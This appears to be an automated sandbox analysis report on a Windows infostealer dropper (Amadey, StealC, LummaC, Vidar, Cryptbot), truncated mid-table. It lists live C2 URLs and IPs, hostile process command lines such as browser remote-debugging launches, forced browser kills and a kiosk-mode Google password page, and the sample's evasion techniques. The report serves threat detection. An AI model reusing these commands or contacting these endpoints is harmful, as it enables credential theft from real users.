Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1561158
MD5:	c524f231dbe4c55a328876f06e2a82d1
SHA1:	8d4c24359d577fcbc818158fc79554169690273b
SHA256:	9561f2e19612f381dfbe538ba59f4f6f4cefe5d0d0f26f0b7fa1fcd095b9f708
Tags:	exeuser-Bitsight
Infos:

Detection

Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Attempt to bypass Chrome Application-Bound Encryption

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Amadeys stealer DLL

Yara detected Credential Flusher

Yara detected Cryptbot

Yara detected LummaC Stealer

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected Vidar stealer

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

C2 URLs / IPs found in malware configuration

Creates multiple autostart registry keys

Disable Windows Defender notifications (registry)

Disable Windows Defender real time protection (registry)

Disables Windows Defender Tamper protection

Drops PE files to the document folder of the user

Drops PE files to the user root directory

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

Query firmware table information (likely to detect VMs)

Sigma detected: New RUN Key Pointing to Suspicious Folder

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Connects to many different domains

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops PE files to the user directory

Enables debug privileges

Entry point lies outside standard sections

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for user specific document files

Sigma detected: Browser Started with Remote Debugging

Sigma detected: CurrentVersion Autorun Keys Modification

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Uses taskkill to terminate processes

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 7540 cmdline: "C:\Users\user\Desktop\file.exe" MD5: C524F231DBE4C55A328876F06E2A82D1)

chrome.exe (PID: 7768 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 7992 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2240 --field-trial-handle=2172,i,13112948501450984096,12498418281894245301,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cmd.exe (PID: 8152 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsKECFIDGCBF.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

DocumentsKECFIDGCBF.exe (PID: 7284 cmdline: "C:\Users\user\DocumentsKECFIDGCBF.exe" MD5: 09109FBE23B94BD3DC2605D7AB550CE3)

skotes.exe (PID: 744 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 09109FBE23B94BD3DC2605D7AB550CE3)

skotes.exe (PID: 7896 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 09109FBE23B94BD3DC2605D7AB550CE3)

fa55e7c5ed.exe (PID: 4296 cmdline: "C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe" MD5: 3540F08B37B30B6C554E0E5FF05A8E97)

chrome.exe (PID: 8144 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 3208 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2620 --field-trial-handle=2536,i,8133912956404692815,15819443204232451158,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

0718eb7837.exe (PID: 6588 cmdline: "C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe" MD5: 6013BD0A6461EE49410F7032CA69EA31)

aedbd2e320.exe (PID: 5956 cmdline: "C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe" MD5: C524F231DBE4C55A328876F06E2A82D1)

2922d7c574.exe (PID: 4600 cmdline: "C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe" MD5: 1B2A1D49F92876B02C7B1BD1EC1EA860)

taskkill.exe (PID: 2484 cmdline: taskkill /F /IM firefox.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 4556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 7416 cmdline: taskkill /F /IM chrome.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 1732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 7552 cmdline: taskkill /F /IM msedge.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 7564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 7620 cmdline: taskkill /F /IM opera.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 7628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 7424 cmdline: taskkill /F /IM brave.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 7540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

firefox.exe (PID: 8100 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

2aff342b40.exe (PID: 3916 cmdline: "C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe" MD5: 739F477149675DE9EA6D954BB446FFAE)

0718eb7837.exe (PID: 7288 cmdline: "C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe" MD5: 6013BD0A6461EE49410F7032CA69EA31)

firefox.exe (PID: 2300 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

firefox.exe (PID: 1700 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

firefox.exe (PID: 3632 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2320 -parentBuildID 20230927232528 -prefsHandle 2256 -prefMapHandle 2248 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d6cb21c8-5f63-43c4-8208-5eeeb72c7a2d} 1700 "\\.\pipe\gecko-crash-server-pipe.1700" 19dd8070510 socket MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

firefox.exe (PID: 6052 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4088 -parentBuildID 20230927232528 -prefsHandle 4064 -prefMapHandle 4060 -prefsLen 26374 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {26ed0bef-963d-49e6-b1bd-7b4e349261f5} 1700 "\\.\pipe\gecko-crash-server-pipe.1700" 19de8a0bc10 rdd MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

aedbd2e320.exe (PID: 6520 cmdline: "C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe" MD5: C524F231DBE4C55A328876F06E2A82D1)

2922d7c574.exe (PID: 3008 cmdline: "C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe" MD5: 1B2A1D49F92876B02C7B1BD1EC1EA860)

taskkill.exe (PID: 7652 cmdline: taskkill /F /IM firefox.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 7624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 4076 cmdline: taskkill /F /IM chrome.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 3704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 4312 cmdline: taskkill /F /IM msedge.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 5924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 2300 cmdline: taskkill /F /IM opera.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 3664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 4960 cmdline: taskkill /F /IM brave.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 1448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

firefox.exe (PID: 5568 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

firefox.exe (PID: 3760 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
CryptBot	A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2.	No Attribution	https://any.run/cybersecurity-blog/cryptbot-infostealer-malware-analysis/ https://asec.ahnlab.com/en/24423/ https://asec.ahnlab.com/en/26052/ https://asec.ahnlab.com/en/31683/ https://asec.ahnlab.com/en/31802/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}

Threatname: LummaC

{"C2 url": "https://property-imper.sbs/api", "Build Version": "LOGS11--LiveTraffi"}

Threatname: Amadey

{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author
dump.pcap	JoeSecurity_Cryptbot	Yara detected Cryptbot	Joe Security
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
0000000E.00000003.2695338579.000000000150D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.2158334223.0000000000821000.00000040.00000001.01000000.0000000B.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000E.00000003.2754545310.0000000001522000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000003.2660335894.000000000150E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2130376795.0000000000CDC000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000003.2325476805.00000000051B0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000000.00000002.2129788119.000000000074E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000020.00000002.2912762087.0000000000E11000.00000040.00000001.01000000.00000010.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000000A.00000003.2153154830.0000000005060000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000E.00000003.2746364474.0000000001519000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000003.2118042916.0000000005010000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000010.00000003.2810105120.00000000016DE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000003.2694420134.0000000001509000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000F.00000002.2737911561.0000000000E11000.00000040.00000001.01000000.00000010.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000003.1709468423.0000000004B80000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000000A.00000002.2193621172.00000000009F1000.00000040.00000001.01000000.0000000D.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000E.00000003.2695385436.0000000001519000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000002.3080728163.00000000009F1000.00000040.00000001.01000000.0000000D.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000E.00000003.2746298150.000000000150C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000F.00000002.2743981437.000000000163E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000020.00000003.2825521059.00000000057C0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000020.00000002.2919990948.0000000001AAB000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000000E.00000003.2660487547.0000000001519000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000003.2719534998.0000000001519000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000F.00000003.2687883624.0000000005150000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000010.00000003.2940443306.00000000016D4000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2130376795.0000000000C11000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000000E.00000003.2659619178.000000000150D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000003.2718825525.0000000001519000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000003.2718722019.000000000150C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 7540	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: file.exe PID: 7540	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: file.exe PID: 7540	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 7540	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: 0718eb7837.exe PID: 6588	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 0718eb7837.exe PID: 6588	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 0718eb7837.exe PID: 6588	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: aedbd2e320.exe PID: 5956	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: aedbd2e320.exe PID: 5956	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: 0718eb7837.exe PID: 7288	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 0718eb7837.exe PID: 7288	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 0718eb7837.exe PID: 7288	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 2922d7c574.exe PID: 4600	JoeSecurity_CredentialFlusher	Yara detected Credential Flusher	Joe Security
Process Memory Space: aedbd2e320.exe PID: 6520	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: aedbd2e320.exe PID: 6520	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 40 entries

Unpacked PEs

Source	Rule	Description	Author
10.2.skotes.exe.9f0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
9.2.DocumentsKECFIDGCBF.exe.820000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
11.2.skotes.exe.9f0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security

Sigma Signatures

System Summary

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 7896, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\0718eb7837.exe

Sigma detected: Browser Started with Remote Debugging

Source: Process started

Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7540, ParentProcessName: file.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default", ProcessId: 7768, ProcessName: chrome.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 7896, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\0718eb7837.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-22T20:36:32.521212+0100	2028371	3	Unknown Traffic	192.168.2.4	49845	172.67.162.84	443	TCP
2024-11-22T20:36:34.590345+0100	2028371	3	Unknown Traffic	192.168.2.4	49852	172.67.162.84	443	TCP
2024-11-22T20:36:37.226843+0100	2028371	3	Unknown Traffic	192.168.2.4	49858	172.67.162.84	443	TCP
2024-11-22T20:36:40.762421+0100	2028371	3	Unknown Traffic	192.168.2.4	49871	172.67.162.84	443	TCP
2024-11-22T20:36:43.392090+0100	2028371	3	Unknown Traffic	192.168.2.4	49878	172.67.162.84	443	TCP
2024-11-22T20:36:46.492104+0100	2028371	3	Unknown Traffic	192.168.2.4	49884	172.67.162.84	443	TCP
2024-11-22T20:36:46.812170+0100	2028371	3	Unknown Traffic	192.168.2.4	49885	172.67.162.84	443	TCP
2024-11-22T20:36:48.786944+0100	2028371	3	Unknown Traffic	192.168.2.4	49893	172.67.162.84	443	TCP
2024-11-22T20:36:49.922885+0100	2028371	3	Unknown Traffic	192.168.2.4	49902	172.67.162.84	443	TCP
2024-11-22T20:36:53.764372+0100	2028371	3	Unknown Traffic	192.168.2.4	49912	172.67.162.84	443	TCP
2024-11-22T20:36:56.963516+0100	2028371	3	Unknown Traffic	192.168.2.4	49921	172.67.162.84	443	TCP
2024-11-22T20:36:57.860754+0100	2028371	3	Unknown Traffic	192.168.2.4	49928	172.67.162.84	443	TCP
2024-11-22T20:37:01.283239+0100	2028371	3	Unknown Traffic	192.168.2.4	49941	172.67.162.84	443	TCP
2024-11-22T20:37:06.351082+0100	2028371	3	Unknown Traffic	192.168.2.4	49956	172.67.162.84	443	TCP
2024-11-22T20:37:10.508064+0100	2028371	3	Unknown Traffic	192.168.2.4	49983	172.67.162.84	443	TCP
2024-11-22T20:37:13.093614+0100	2028371	3	Unknown Traffic	192.168.2.4	49998	172.67.162.84	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-22T20:36:33.243107+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49845	172.67.162.84	443	TCP
2024-11-22T20:36:35.392630+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49852	172.67.162.84	443	TCP
2024-11-22T20:36:47.380384+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49884	172.67.162.84	443	TCP
2024-11-22T20:36:50.626684+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49893	172.67.162.84	443	TCP
2024-11-22T20:36:58.591029+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49928	172.67.162.84	443	TCP
2024-11-22T20:37:14.669890+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49998	172.67.162.84	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-22T20:36:33.243107+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49845	172.67.162.84	443	TCP
2024-11-22T20:36:47.380384+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49884	172.67.162.84	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-22T20:36:35.392630+0100	2049812	1	A Network Trojan was detected	192.168.2.4	49852	172.67.162.84	443	TCP
2024-11-22T20:36:50.626684+0100	2049812	1	A Network Trojan was detected	192.168.2.4	49893	172.67.162.84	443	TCP

ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-22T20:37:00.115386+0100	2019714	2	Potentially Bad Traffic	192.168.2.4	49939	185.215.113.16	80	TCP
2024-11-22T20:37:16.202162+0100	2019714	2	Potentially Bad Traffic	192.168.2.4	50008	185.215.113.16	80	TCP

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-22T20:36:22.418143+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49821	185.215.113.43	80	TCP
2024-11-22T20:36:31.462265+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49842	185.215.113.43	80	TCP
2024-11-22T20:36:40.006155+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49864	185.215.113.43	80	TCP
2024-11-22T20:36:47.248102+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49886	185.215.113.43	80	TCP
2024-11-22T20:36:57.567639+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49924	185.215.113.43	80	TCP

ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
